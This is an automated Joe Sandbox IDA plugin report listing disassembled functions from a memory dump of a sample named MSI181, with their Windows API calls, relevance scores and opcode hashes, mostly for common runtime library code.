Strings

pL], xrefs: 005823D0, 0058242A
X], xrefs: 005823DA
<], xrefs: 00582407
\L], xrefs: 00582370

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID: <]$X]$\L]$pL]
API String ID: 325507722-3118318005
Opcode ID: 99163bdc4c4f708709171f0f537d05fb7213203e643e7a076a8dd46f30644651
Instruction ID: 6eef89867b703f472231a0b616915d4c074447d74062336b3eb9dbd59c512a2c
Opcode Fuzzy Hash: 99163bdc4c4f708709171f0f537d05fb7213203e643e7a076a8dd46f30644651
Instruction Fuzzy Hash: 8F2124B09062419FD730EF98B94BB497FA0F736720F04466BE8259A3E0D7749908EF52

Uniqueness

Uniqueness Score: -1.00%

Function 005B5D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005B5DFA

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction ID: b9dc348e874bc86d2de1992a249db2915aca86bedbb538f73f0a4c54fb23c0f3
Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction Fuzzy Hash: 35B14A729056469FDB19CF68C885BFEBFA5FF59300F148169E504AB341E235ED01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005BB02D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 005BB0C8
FindNextFileW.KERNEL32(00000000,?), ref: 005BB143
FindClose.KERNEL32(00000000), ref: 005BB165
FindClose.KERNEL32(00000000), ref: 005BB188

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 40f29e2033e8b3583cb4656117415408c0a6fc9387174da70558957c56212440
Instruction ID: 535da723cf00ffdb7b2624147d7a02d2122142501681cfdb7fe773b810d27e0b
Opcode Fuzzy Hash: 40f29e2033e8b3583cb4656117415408c0a6fc9387174da70558957c56212440
Instruction Fuzzy Hash: 2E417171900619AEEB20EF68CC9DEFFBBB9FB85304F144195E415A6144E7B0AE84DB60

Uniqueness

Uniqueness Score: -1.00%

Function 005A33A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005A33B4
IsDebuggerPresent.KERNEL32 ref: 005A3480
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005A34A0
UnhandledExceptionFilter.KERNEL32(?), ref: 005A34AA

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1cbcd4c7f5b3c5da8f554a741ae417e6524b02c31aff12de00bf2a689df34ebc
Instruction ID: c3fffccfe1adf85401a14b3a21b172258caebfb90786837a26cc2b79c40f55b7
Opcode Fuzzy Hash: 1cbcd4c7f5b3c5da8f554a741ae417e6524b02c31aff12de00bf2a689df34ebc
Instruction Fuzzy Hash: 0F312375D0521D9BDB20DFA4D989BCDBBB8BF08304F1040AAE50CAB250EB719B89DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0058D0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0058C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,F302A5AA,?,005C3D30,000000FF), ref: 0058C657
Part of subcall function 0058C630: GetLastError.KERNEL32(?,00000000,00000000,F302A5AA,?,005C3D30,000000FF), ref: 0058C661

IsDebuggerPresent.KERNEL32(?,?,005D8AF0), ref: 0058D0D8
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,005D8AF0), ref: 0058D0E7

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0058D0E2

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: cf763868dd8c18a69cc7adfc744aaab6cea52da6536fc47ca5f5f46401c9f65f
Instruction ID: d2d1532ede97c54c8a79bdb37298ae1101d3b4c4b4f0893b96d735c8f9f71644
Opcode Fuzzy Hash: cf763868dd8c18a69cc7adfc744aaab6cea52da6536fc47ca5f5f46401c9f65f
Instruction Fuzzy Hash: 90E039702047418FE360AF69E80CB42BFE0BB28300F04885DA895E6A80E7B4D54CDFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005BE237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BE28B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BE2D5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BE39B

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 7477c843163cf883073ad152a14f5b617f3a687261c22049ee3b80325638137b
Instruction ID: 04050d0af00400bddc2325f5eaf930e6c3be022a9f155d25176104988a7562ce
Opcode Fuzzy Hash: 7477c843163cf883073ad152a14f5b617f3a687261c22049ee3b80325638137b
Instruction Fuzzy Hash: 00617C719042079FEB289F28CC87BEA7BE8FF59300F1845A9E915C6285E774F985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005A6E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005A6F13
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005A6F1D
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 005A6F2A

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 257d5752817e91d75d991226f48847e19c2b7204343dac5a50fa774a324556d1
Instruction ID: 5ad2a3aae2a57d9d351ae172d59d40fd2c120183da7ffde9cf4f2776d0c9be6b
Opcode Fuzzy Hash: 257d5752817e91d75d991226f48847e19c2b7204343dac5a50fa774a324556d1
Instruction Fuzzy Hash: ED31C1B4D0122DABCB21DF68D989B8DBBB8BF58310F5041EAE51CA7250E7709B859F44

Uniqueness

Uniqueness Score: -1.00%

Function 005845B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,F302A5AA,00000001,00000000,?,00000000,005C4460,000000FF,?,0058474D,00583778,?,00000000,00000000,?), ref: 005845DB
LockResource.KERNEL32(00000000,?,00000000,005C4460,000000FF,?,0058474D,00583778,?,00000000,00000000,?,?,?,?,00583778), ref: 005845E6
SizeofResource.KERNEL32(00000000,00000000,?,00000000,005C4460,000000FF,?,0058474D,00583778,?,00000000,00000000,?,?,?), ref: 005845F4

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: e34f292de67d889415a9cc320b9e23ac7f54cc5fed8bf35f04580a372a5da3ec
Instruction ID: 8b70e1db56b71d9c73acfb58294ce7a8feeeb3f7f4c4bfa4208f0716f63faa13
Opcode Fuzzy Hash: e34f292de67d889415a9cc320b9e23ac7f54cc5fed8bf35f04580a372a5da3ec
Instruction Fuzzy Hash: 6611A732A046559BC7359F5ADC44F66FBB8F799715F00052AEC16E3640F6359C048F94

Uniqueness

Uniqueness Score: -1.00%

Function 005BE111 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

EnumSystemLocalesW.KERNEL32(005BE237,00000001,00000000,?,-00000050,?,005BE868,00000000,?,?,?,00000055,?), ref: 005BE183

Strings

h[, xrefs: 005BE158

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: h[
API String ID: 2417226690-2192341851
Opcode ID: 3341100b7818caa86b3719a9d1d399a8a2a6d97e82c36b8c40cc9ef2a0ad7359
Instruction ID: 7b8b29ef990955fdcc52d42ba7109e0c31d96674e1086a20780d89686da5d416
Opcode Fuzzy Hash: 3341100b7818caa86b3719a9d1d399a8a2a6d97e82c36b8c40cc9ef2a0ad7359
Instruction Fuzzy Hash: 0111293A2007019FDB189F39C8969FABBA2FF84758B19442CE54647A40D371B942CB40

Uniqueness

Uniqueness Score: -1.00%

Function 005B76AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005B4E3F,?,20001004,00000000,00000002,?,?,005B4441), ref: 005B76E3

Strings

2Z, xrefs: 005B76CE

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: InfoLocale
String ID: 2Z
API String ID: 2299586839-2484645983
Opcode ID: 6949a22f626db9fa009551b242bd14e959c1a6fc6c39425600d157cf614ec538
Instruction ID: bc6893ba3a8925f6d5337fcf9e44f04293f51e11cb3d7a2fbf1ec237c6333567
Opcode Fuzzy Hash: 6949a22f626db9fa009551b242bd14e959c1a6fc6c39425600d157cf614ec538
Instruction Fuzzy Hash: 7BE01A3650862DBBCB122F65DC09EEE7F26FF88760F044010FD05651208B31A920AA95

Uniqueness

Uniqueness Score: -1.00%

Function 005AE270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction ID: a2b200a8db5ca18c680020f5ba3607801b230afcef0387a6056891c1a5d20022
Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction Fuzzy Hash: D2F14071E012199FDF14CFA8D881AADBBB1FF99324F158669E815A7381D730AE01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 005AA587 Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

T], xrefs: 005AA589
0, xrefs: 005AA715

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID: 0$T]
API String ID: 0-1076685716
Opcode ID: e2c39f723175214ab647c3ca676eb122efd440b21f830217dc2cf2da83977f5a
Instruction ID: eb6cf2e63a1891f469a72960c4728a58644ca9be608a276a902287e31cdc6a5b
Opcode Fuzzy Hash: e2c39f723175214ab647c3ca676eb122efd440b21f830217dc2cf2da83977f5a
Instruction Fuzzy Hash: C5C1AC709006468FDF29CF28C49467EBFB1BF4B310F284A19D4969B292D735AD46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005B7B1F Relevance: 1.9, APIs: 1, Instructions: 410timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,005B7F64,00000000,00000000,00000000), ref: 005B7E23

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 614344066888799bb19251b028e21a70dd17096b1f8f0b33fd00d65770150443
Instruction ID: 652555b5eca470b5938d53c4a248e76b49a1e5984af23074183d34237eb6c370
Opcode Fuzzy Hash: 614344066888799bb19251b028e21a70dd17096b1f8f0b33fd00d65770150443
Instruction Fuzzy Hash: CED1F47290411AABDB20BB64DC06AFE7FA8FFC9750F544056F901AB291F770AE40DB94

Uniqueness

Uniqueness Score: -1.00%

Function 005B84BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005B84B8,?,?,00000008,?,?,005C14E4,00000000), ref: 005B86EA

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6e08f3d22c57315dc3bf8c2c4755197927dcb208d247f30b86bd0d8a4e92952e
Instruction ID: 0e332bef381f70a5aea38e584da53ac71cf673c0f98437ce1819f675768e073d
Opcode Fuzzy Hash: 6e08f3d22c57315dc3bf8c2c4755197927dcb208d247f30b86bd0d8a4e92952e
Instruction Fuzzy Hash: 9BB14D31210609DFDB14CF28C48ABA57FE4FF45364F259658E89ACF2A1CB36E991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 005A35A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005A35BF

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 378ccf3a2f6f18ac08092794797ddf7e94e921a190c3c7f931f3cf5332cbfb5e
Instruction ID: 8f52e56da43b4a87092796387397749e5757209cb5b2d20814cea9da2f364748
Opcode Fuzzy Hash: 378ccf3a2f6f18ac08092794797ddf7e94e921a190c3c7f931f3cf5332cbfb5e
Instruction Fuzzy Hash: 805168B1902205CBEB29CF59D8857AEBFF0FB48348F14842BE405EB250D3749A04DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005BE48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005BE4DE

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: bac3c6aac661705512e712e2a2125c02a40f237b60c177f539c884602b6f91c9
Instruction ID: 7230d00b10df413c121d45bb59be7ea31790a3b1436bc8e42c8f6bf9779061c1
Opcode Fuzzy Hash: bac3c6aac661705512e712e2a2125c02a40f237b60c177f539c884602b6f91c9
Instruction Fuzzy Hash: F5218072604207ABDB389E25DC56AFE7BA8FF45714B1800AAF905C6181FB74FD44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 005BE6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005BE453,00000000,00000000,?), ref: 005BE6E5

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b0b978716bc3644874e4711d81c4a89b8f8aac9209640c28e88997897bab8263
Instruction ID: 13c6a06c72f691b624226d20cfed0ebf7de00846e7ae2dea7a9bdc38a6cc4dda
Opcode Fuzzy Hash: b0b978716bc3644874e4711d81c4a89b8f8aac9209640c28e88997897bab8263
Instruction Fuzzy Hash: F6F0A936610256BBDB2856658C0BBFA7F58FB40794F1D0824EC16A3180EE74FD41C690

Uniqueness

Uniqueness Score: -1.00%

Function 005BE1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

EnumSystemLocalesW.KERNEL32(005BE48A,00000001,?,?,-00000050,?,005BE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 005BE1F6

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 94f0d61c83a84691cc394b109042b7a238a9fd57873a07ec44b50358c14c223b
Instruction ID: 9d1f341a674afd87ee27526397f3ffb1a1082f0f17af6e22bdba8f44a28188f2
Opcode Fuzzy Hash: 94f0d61c83a84691cc394b109042b7a238a9fd57873a07ec44b50358c14c223b
Instruction Fuzzy Hash: D2F0FC363007055FDB255F399C86AFA7F95FF80768F19442CF5058B681D671BC42DA50

Uniqueness

Uniqueness Score: -1.00%

Function 005B7132 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 005B1C9A: EnterCriticalSection.KERNEL32(-005DDE50,?,005B3576,?,005DA078,0000000C,005B3841,?), ref: 005B1CA9

EnumSystemLocalesW.KERNEL32(Function_00037125,00000001,005DA1D8,0000000C,005B7554,?), ref: 005B716A

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 1417b7fd1cd424c8d7d09ddadc3593aaa05adaa870ac7dace55aa0ebb1058497
Instruction ID: 318f6a70b6e17dfac149f4ec97f218da0380df3704edfaf98e371e72a54c56ef
Opcode Fuzzy Hash: 1417b7fd1cd424c8d7d09ddadc3593aaa05adaa870ac7dace55aa0ebb1058497
Instruction Fuzzy Hash: C0F08772A04205DFD710EF98E80AB9C7BE0FB88321F00422BF411DB2A0DB74A904DF50

Uniqueness

Uniqueness Score: -1.00%

